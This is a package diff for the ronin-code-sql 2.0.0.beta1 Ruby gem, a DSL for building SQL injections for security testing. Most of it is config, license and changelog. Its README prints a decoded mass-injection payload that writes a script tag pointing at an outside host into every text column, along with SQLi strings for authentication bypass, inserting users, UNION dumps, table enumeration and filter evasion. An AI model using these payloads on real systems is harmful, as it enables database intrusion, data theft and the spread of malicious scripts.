ronin-code-sql 2.0.0.beta1

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: fc5de90b2961287f9110ba16c922ad1b8e787563d7fb93a075834cb6935b2da9
+  data.tar.gz: 61e12da2b15fa8306677b1f0bcaa1c1b973512bb5339e162af7eca6f15fdfb19
+SHA512:
+  metadata.gz: 43387545e4de6ca18387df0ac5a8af970b0b99ce6fc0300094e61bc2898351dbeae176bd66ab0e097cf0028e164cf8c19c8841787839b71a8e964627b53be9c3
+  data.tar.gz: 3b057ebcd0be473896562afb5d4159ab9930c1a0008f789f3c8473991b452eee485b0dfa8351b02401945b0b9c2777d21257e325ed5bd823ab1685a10e617109

data/.document

@@ -0,0 +1,4 @@
+lib/**/*.rb
+- 
+ChangeLog.md
+COPYING.txt

data/.editorconfig

@@ -0,0 +1,11 @@
+root = true
+
+[*]
+end_of_line = lf
+insert_final_newline = true
+tab_width = 8
+trim_trailing_whitespace = true
+
+[{Gemfile,Rakefile,*.rb,*.gemspec,*.yml}]
+indent_style = space
+indent_size = 2

data/.github/workflows/ruby.yml

@@ -0,0 +1,27 @@
+name: CI
+
+on: [ push, pull_request ]
+
+jobs:
+  tests:
+    runs-on: ubuntu-latest
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.0'
+          - '3.1'
+          - '3.2'
+          - jruby
+          - truffleruby
+    name: Ruby ${{ matrix.ruby }}
+    steps:
+      - uses: actions/checkout@v2
+      - name: Set up Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+      - name: Install dependencies
+        run: bundle install --jobs 4 --retry 3
+      - name: Run tests
+        run: bundle exec rake test

data/.gitignore

@@ -0,0 +1,11 @@
+doc
+pkg
+vendor/cache
+Gemfile.lock
+.bundle
+.DS_Store
+.yardoc
+*.db
+*.log
+*.swp
+*~

data/.mailmap

@@ -0,0 +1 @@
+Postmodern <postmodern.mod3@gmail.com>	postmodern <postmodern.mod3@gmail.com>

data/.rspec

@@ -0,0 +1 @@
+--colour --format documentation

data/.ruby-version

@@ -0,0 +1 @@
+ruby-3.1

data/.yardopts

@@ -0,0 +1 @@
+--markup markdown --title 'Ronin SQL Documentation' --protected

data/COPYING.txt

@@ -0,0 +1,165 @@
+                   GNU LESSER GENERAL PUBLIC LICENSE
+                       Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+
+  This version of the GNU Lesser General Public License incorporates
+the terms and conditions of version 3 of the GNU General Public
+License, supplemented by the additional permissions listed below.
+
+  0. Additional Definitions.
+
+  As used herein, "this License" refers to version 3 of the GNU Lesser
+General Public License, and the "GNU GPL" refers to version 3 of the GNU
+General Public License.
+
+  "The Library" refers to a covered work governed by this License,
+other than an Application or a Combined Work as defined below.
+
+  An "Application" is any work that makes use of an interface provided
+by the Library, but which is not otherwise based on the Library.
+Defining a subclass of a class defined by the Library is deemed a mode
+of using an interface provided by the Library.
+
+  A "Combined Work" is a work produced by combining or linking an
+Application with the Library.  The particular version of the Library
+with which the Combined Work was made is also called the "Linked
+Version".
+
+  The "Minimal Corresponding Source" for a Combined Work means the
+Corresponding Source for the Combined Work, excluding any source code
+for portions of the Combined Work that, considered in isolation, are
+based on the Application, and not on the Linked Version.
+
+  The "Corresponding Application Code" for a Combined Work means the
+object code and/or source code for the Application, including any data
+and utility programs needed for reproducing the Combined Work from the
+Application, but excluding the System Libraries of the Combined Work.
+
+  1. Exception to Section 3 of the GNU GPL.
+
+  You may convey a covered work under sections 3 and 4 of this License
+without being bound by section 3 of the GNU GPL.
+
+  2. Conveying Modified Versions.
+
+  If you modify a copy of the Library, and, in your modifications, a
+facility refers to a function or data to be supplied by an Application
+that uses the facility (other than as an argument passed when the
+facility is invoked), then you may convey a copy of the modified
+version:
+
+   a) under this License, provided that you make a good faith effort to
+   ensure that, in the event an Application does not supply the
+   function or data, the facility still operates, and performs
+   whatever part of its purpose remains meaningful, or
+
+   b) under the GNU GPL, with none of the additional permissions of
+   this License applicable to that copy.
+
+  3. Object Code Incorporating Material from Library Header Files.
+
+  The object code form of an Application may incorporate material from
+a header file that is part of the Library.  You may convey such object
+code under terms of your choice, provided that, if the incorporated
+material is not limited to numerical parameters, data structure
+layouts and accessors, or small macros, inline functions and templates
+(ten or fewer lines in length), you do both of the following:
+
+   a) Give prominent notice with each copy of the object code that the
+   Library is used in it and that the Library and its use are
+   covered by this License.
+
+   b) Accompany the object code with a copy of the GNU GPL and this license
+   document.
+
+  4. Combined Works.
+
+  You may convey a Combined Work under terms of your choice that,
+taken together, effectively do not restrict modification of the
+portions of the Library contained in the Combined Work and reverse
+engineering for debugging such modifications, if you also do each of
+the following:
+
+   a) Give prominent notice with each copy of the Combined Work that
+   the Library is used in it and that the Library and its use are
+   covered by this License.
+
+   b) Accompany the Combined Work with a copy of the GNU GPL and this license
+   document.
+
+   c) For a Combined Work that displays copyright notices during
+   execution, include the copyright notice for the Library among
+   these notices, as well as a reference directing the user to the
+   copies of the GNU GPL and this license document.
+
+   d) Do one of the following:
+
+       0) Convey the Minimal Corresponding Source under the terms of this
+       License, and the Corresponding Application Code in a form
+       suitable for, and under terms that permit, the user to
+       recombine or relink the Application with a modified version of
+       the Linked Version to produce a modified Combined Work, in the
+       manner specified by section 6 of the GNU GPL for conveying
+       Corresponding Source.
+
+       1) Use a suitable shared library mechanism for linking with the
+       Library.  A suitable mechanism is one that (a) uses at run time
+       a copy of the Library already present on the user's computer
+       system, and (b) will operate properly with a modified version
+       of the Library that is interface-compatible with the Linked
+       Version.
+
+   e) Provide Installation Information, but only if you would otherwise
+   be required to provide such information under section 6 of the
+   GNU GPL, and only to the extent that such information is
+   necessary to install and execute a modified version of the
+   Combined Work produced by recombining or relinking the
+   Application with a modified version of the Linked Version. (If
+   you use option 4d0, the Installation Information must accompany
+   the Minimal Corresponding Source and Corresponding Application
+   Code. If you use option 4d1, you must provide the Installation
+   Information in the manner specified by section 6 of the GNU GPL
+   for conveying Corresponding Source.)
+
+  5. Combined Libraries.
+
+  You may place library facilities that are a work based on the
+Library side by side in a single library together with other library
+facilities that are not Applications and are not covered by this
+License, and convey such a combined library under terms of your
+choice, if you do both of the following:
+
+   a) Accompany the combined library with a copy of the same work based
+   on the Library, uncombined with any other library facilities,
+   conveyed under the terms of this License.
+
+   b) Give prominent notice with the combined library that part of it
+   is a work based on the Library, and explaining where to find the
+   accompanying uncombined form of the same work.
+
+  6. Revised Versions of the GNU Lesser General Public License.
+
+  The Free Software Foundation may publish revised and/or new versions
+of the GNU Lesser General Public License from time to time. Such new
+versions will be similar in spirit to the present version, but may
+differ in detail to address new problems or concerns.
+
+  Each version is given a distinguishing version number. If the
+Library as you received it specifies that a certain numbered version
+of the GNU Lesser General Public License "or any later version"
+applies to it, you have the option of following the terms and
+conditions either of that published version or of any later version
+published by the Free Software Foundation. If the Library as you
+received it does not specify a version number of the GNU Lesser
+General Public License, you may choose any version of the GNU Lesser
+General Public License ever published by the Free Software Foundation.
+
+  If the Library as you received it specifies that a proxy can decide
+whether future versions of the GNU Lesser General Public License shall
+apply, that proxy's public statement of acceptance of any version is
+permanent authorization for you to choose that version for the
+Library.

data/ChangeLog.md

@@ -0,0 +1,104 @@
+### 2.0.0 / 2023-XX-XX
+
+* Require `ruby` >= 3.0.0.
+* Added [ronin-support] ~> 0.1 as a dependency.
+* Renmaed `ronin/formatting/sql` to `ronin/support/encoding/sql` and moved it
+  back into [ronin-support].
+
+[ronin-support]: https://github.com/ronin-rb/ronin-support#readme
+
+### 1.1.0 / 2013-01-22
+
+* Added `Ronin::SQL::InjectionExpr`, so that statements specified within
+  `and { }`, `or { }` blocks would not be appending to the
+  `Ronin::SQL::Injection` object.
+* Made `Ronin::SQL::Field` emittable.
+* Added `Ronin::SQL::Emitter#emit_argument`, so that any sub-statements will
+  be wrapped in `( )`.
+* Improved `Ronin::SQL::Emitter#emit_field`.
+* Fixed `Ronin::SQL::Emitter#emit` to pass `Ronin::SQL::Function`s to
+  `Ronin::SQL::Emitter#emit_function`.
+
+### 1.0.0 / 2013-01-21
+
+* Require [Ruby] >= 1.9.1.
+* No longer require ronin.
+* No longer require ronin-web.
+* Added `String#sql_unescape`.
+* Moved `String#sql_escape`, `String#sql_encode` and `String#sql_decode`
+  from [ronin-support].
+* Refactored the `Ronin::SQL SQL` DSL to be more like
+  [ARel](https://github.com/rails/arel#readme).
+  * Moved the DSL from `Ronin::Code::SQL` into `Ronin::SQL`.
+* Removed `Ronin::SQL::Error`.
+* Removed `String#sql_error`.
+* Removed `String#sql_error?`.
+* Removed `URI::HTTP.has_sql_errors?`.
+* Removed `URI::HTTP.sql_error`.
+* Removed `URI::HTTP.sql_errors`.
+
+### 0.2.4 / 2009-09-24
+
+* Require ronin >= 0.3.0.
+* Require ronin-web >= 0.2.0.
+* Require rspec >= 1.1.12.
+* Require yard >= 0.2.3.5.
+* Updated the project summary and 3-point description for Ronin SQL.
+* Moved to YARD based documentation.
+* Fixed a formatting issue in the README.txt file, which was causing RDoc
+  to crash.
+
+### 0.2.3 / 2009-07-02
+
+* Use Hoe >= 2.0.0.
+* Require ronin >= 0.2.4.
+* Require ronin-web >= 0.1.3.
+* Use Ronin::Scanners::Scanner to define the scanner for finding
+  `Ronin::SQL::Injection` objects for URI::HTTP urls.
+* Added more specs.
+
+### 0.2.2 / 2009-01-22
+
+* Depend on the new ronin-web library.
+* Replace Hpricot with Nokogiri.
+* Use the new Ronin::Web::Spider, instead of directly using Spidr.
+* Use the new Nokogiri extensions from ronin-web.
+
+### 0.2.1 / 2009-01-09
+
+* Added missing files to the Manifest.
+
+### 0.2.0 / 2009-01-08
+
+* Require ronin >= 0.1.3.
+* Refactored `Ronin::Code::SQL`.
+  * Implemented a token emitter system.
+  * Support common SQL expression modifiers.
+  * Support common SQL clauses.
+  * Allow for injecting arbitrary SQL clauses.
+  * Added more SQL Injection test generators.
+    * all_rows: `OR 1 = 1`
+    * exact_rows: `AND 1 = 1`
+    * no_rows: `AND 1 = 0`
+    * has_column?(column): `OR column IS NOT NULL`
+    * has_table?(table): `AND (SELECT FROM table count(*) == 1)`
+    * uses_column?(column): `GROUP BY column HAVING 1 = 1`
+    * uses_table?(table): `OR table IS NOT NULL`
+* Removed references to `Ronin::Vulnerable`.
+* Added more specs:
+  * Specs for most of `Ronin::Code::SQL`.
+  * Specs on `Ronin::SQL::Error` and the SQL encoding/decoding extensions for
+    the String class.
+
+### 0.1.1 / 2008-09-28
+
+* Trivial bug fix to `URI::HTTP#sql_errors`.
+
+### 0.1.0 / 2007-12-23
+
+* Initial release.
+* Supports SQL code generation.
+* Supports obfuscation of SQL code.
+* Supports SQL Injection code generation.
+
+[Ruby]: http://www.ruby-lang.org/

data/Gemfile

@@ -0,0 +1,28 @@
+source 'https://rubygems.org'
+
+gemspec
+
+platform :jruby do
+  gem 'jruby-openssl',	'~> 0.7'
+end
+
+# Library dependencies
+# gem 'ronin-support',	       '~> 1.0', github: "ronin-rb/ronin-support",
+#                                        branch: 'main'
+
+group :development do
+  gem 'rake'
+  gem 'rubygems-tasks',  '~> 0.1'
+
+  gem 'rspec',           '~> 3.0'
+  gem 'simplecov',       '~> 0.20'
+
+  gem 'kramdown',        '~> 2.3'
+  gem 'redcarpet',       platform: :mri
+  gem 'yard',            '~> 0.9'
+  gem 'yard-spellcheck', require: false
+
+  gem 'dead_end',        require: false
+  gem 'sord',            require: false, platform: :mri
+  gem 'stackprof',       require: false, platform: :mri
+end

data/README.md

@@ -0,0 +1,212 @@
+# ronin-code-sql
+
+[![CI](https://github.com/ronin-rb/ronin-code-sql/actions/workflows/ruby.yml/badge.svg)](https://github.com/ronin-rb/ronin-code-sql/actions/workflows/ruby.yml)
+[![Code Climate](https://codeclimate.com/github/ronin-rb/ronin-code-sql.svg)](https://codeclimate.com/github/ronin-rb/ronin-code-sql)
+
+* [Source](https://github.com/ronin-rb/ronin-code-sql)
+* [Issues](https://github.com/ronin-rb/ronin-code-sql/issues)
+* [Documentation](https://ronin-rb.dev/docs/ronin-code-sql/frames)
+* [Discord](https://discord.gg/6WAb3PsVX9) |
+  [Twitter](https://twitter.com/ronin_rb) |
+  [Mastodon](https://infosec.exchange/@ronin_rb)
+
+## Description
+
+{Ronin::Code::SQL} is a Ruby DSL for crafting [SQL Injections (SQLi)][SQLi].
+
+### Features
+
+* Provides convenience methods for encoding/decoding SQL data.
+* Provides an Domain Specific Language (DSL) for crafting normal SQL and
+  [SQL injections][SQLi].
+* Has 99% documentation coverage.
+* Has 98% test coverage.
+
+## Examples
+
+### Convenience Methods
+
+Escape a String:
+
+```ruby
+"O'Brian".sql_escape
+# => "'O''Brian'"
+```
+
+Unescapes a SQL String:
+
+```ruby
+"'O''Brian'".sql_unescape
+# => "O'Briand"
+```
+
+Hex encode a String:
+
+```ruby
+"exploit".sql_encode
+# => "0x6578706c6f6974"
+```
+
+Hex decode a String:
+
+```ruby
+string = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
+string.sql_decode
+# => "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''+['+@C+'] where '+@C+' not like ''%\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
+```
+
+### SQLi DSL
+
+Injecting a `1=1` test into a Integer comparison:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.or { 1 == 1 }
+puts sqli
+# 1 OR 1=1
+```
+
+Injecting a `1=1` test into a String comparison:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new(escape: :string)
+sqli.or { string(1) == string(1) }
+puts sqli
+# 1' OR '1'='1
+```
+
+Columns:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and { admin == 1 }
+puts sqli
+# 1 AND admin=1
+```
+
+Clauses:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.or { 1 == 1 }.limit(0)
+puts sqli
+# 1 OR 1=1 LIMIT 0
+```
+
+Statements:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and { 1 == 0 }
+sqli.insert.into(:users).values('hacker','passw0rd','t')
+puts sqli
+# 1 AND 1=0; INSERT INTO users VALUES ('hacker','passw0rd','t')
+```
+
+Sub-Statements:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.union { select(1,2,3,4,id).from(users) }
+puts sqli
+# 1 UNION SELECT (1,2,3,4,id) FROM users
+```
+
+Test if a table exists:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and { select(count).from(:users) == 1 }
+puts sqli
+# 1 AND (SELECT COUNT(*) FROM users)=1
+```
+
+Create errors by using non-existant tables:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new(escape: :string)
+sqli.and { non_existant_table == '1' }
+puts sqli
+# 1' AND non_existant_table='1
+```
+
+Dumping all values of a column:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new(escape: :string)
+sqli.or { username.is_not(null) }.or { username == '' }
+puts sqli
+# 1' OR username IS NOT NULL OR username='
+```
+
+Enumerate through database table names:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.and {
+  ascii(
+    lower(
+      substring(
+        select(:name).top(1).from(sysobjects).where { xtype == 'U' }, 1, 1
+      )
+    )
+  ) > 116
+}
+puts sqli
+# 1 AND ASCII(LOWER(SUBSTRING((SELECT name TOP 1 FROM sysobjects WHERE xtype='U'),1,1)))>116
+```
+
+Find user supplied tables via the `sysObjects` table:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.union_all {
+  select(1,2,3,4,5,6,name).from(sysObjects).where { xtype == 'U' }
+}
+puts sqli.to_sql(terminate: true)
+# 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype='U');--
+```
+
+Bypass filters using `/**/` instead of spaces:
+
+```ruby
+sqli = Ronin::Code::SQL::Injection.new
+sqli.union { select(1,2,3,4,id).from(users) }
+puts sqli.to_sql(space: '/**/')
+# 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
+```
+
+## Requirements
+
+* [Ruby] >= 3.0.0
+* [ronin-support] ~> 1.0
+
+## Install
+
+```shell
+$ gem install ronin-code-sql
+```
+
+## License
+
+ronin-code-sql - A Ruby DSL for crafting SQL Injections.
+
+Copyright (c) 2007-2022 Hal Brodigan (postmodern.mod3 at gmail.com)
+
+ronin-code-sql is free software: you can redistribute it and/or modify
+it under the terms of the GNU Lesser General Public License as published
+by the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+ronin-code-sql is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public License
+along with ronin-code-sql.  If not, see <https://www.gnu.org/licenses/>.
+
+[SQLi]: http://en.wikipedia.org/wiki/SQL_injection
+
+[Ruby]: http://www.ruby-lang.org
+[ronin-support]: https://github.com/ronin-rb/ronin-support#readme

data/Rakefile

@@ -0,0 +1,30 @@
+require 'rubygems'
+
+begin
+  require 'bundler'
+rescue LoadError => e
+  warn e.message
+  warn "Run `gem install bundler` to install Bundler."
+  exit e.status_code
+end
+
+begin
+  Bundler.setup(:development)
+rescue Bundler::BundlerError => e
+  warn e.message
+  warn "Run `bundle install` to install missing gems"
+  exit e.status_code
+end
+
+require 'rake'
+
+require 'rubygems/tasks'
+Gem::Tasks.new(sign: {checksum: true, pgp: true})
+
+require 'rspec/core/rake_task'
+RSpec::Core::RakeTask.new
+task :test    => :spec
+task :default => :spec
+
+require 'yard'
+YARD::Rake::YardocTask.new

data/gemspec.yml

@@ -0,0 +1,25 @@
+name: ronin-code-sql
+summary: A Ruby DSL for crafting SQL Injections.
+description:
+  ronin-code-sql is a Ruby DSL for crafting SQL Injections.
+
+license: LGPL-3.0
+authors: Postmodern
+email: postmodern.mod3@gmail.com
+homepage: https://github.com/ronin-rb/ronin-code-sql#readme
+has_yard: true
+
+metadata:
+  documentation_uri: https://rubydoc.info/gems/ronin-code-sql
+  source_code_uri:   https://github.com/ronin-rb/ronin-code-sql
+  bug_tracker_uri:   https://github.com/ronin-rb/ronin-code-sql/issues
+  changelog_uri:     https://github.com/ronin-rb/ronin-code-sql/blob/master/ChangeLog.md
+  rubygems_mfa_required: 'true'
+
+required_ruby_version: ">= 3.0.0"
+
+dependencies:
+  ronin-support: ~> 1.0.0.beta1
+
+development_dependencies:
+  bundler: ~> 2.0